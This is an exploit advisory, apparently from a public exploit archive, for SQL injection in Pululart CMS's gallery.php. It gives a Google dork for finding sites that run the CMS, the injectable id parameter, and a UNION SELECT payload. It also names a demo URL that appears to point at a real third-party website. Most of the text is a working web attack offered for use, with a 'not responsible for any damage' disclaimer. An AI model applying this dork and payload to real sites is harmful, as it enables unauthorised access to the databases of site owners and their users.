Pululart CMS suffers from a remote SQL injection vulnerability. Note that this finding houses site-specific data.
3ed2aab95af8401cf925aa4d494cbd67b17a1251e863d7e1c04808e25adcef68
###################################################################################
# Exploit Title: Pululart CMS Sql Injection Vulnerability
#
# Google Dork:intext:"Powered by Pululart"
#
# Date: 08/24/2012
#
# Author: Crim3R
#
# Vendor Home : http://www.pululart.com/
#
# Tested on: all
#
###################################################################################
$
$ ----Author will be not responsible for any damage----
$
###################################################################################
========================================
http://target.com/gallery.php?id=[id][sql injection]
sqli = +union+all+select+1,2,3,4--
D3M0 :
http://www.renrox.com/gallery.php?id=67
===============Crim3R@Att.Net===========
$home = %00
thanks to : 2MzRp - Mikili - 0x0ptim0us - iC0d3R - farbodmahini & Amir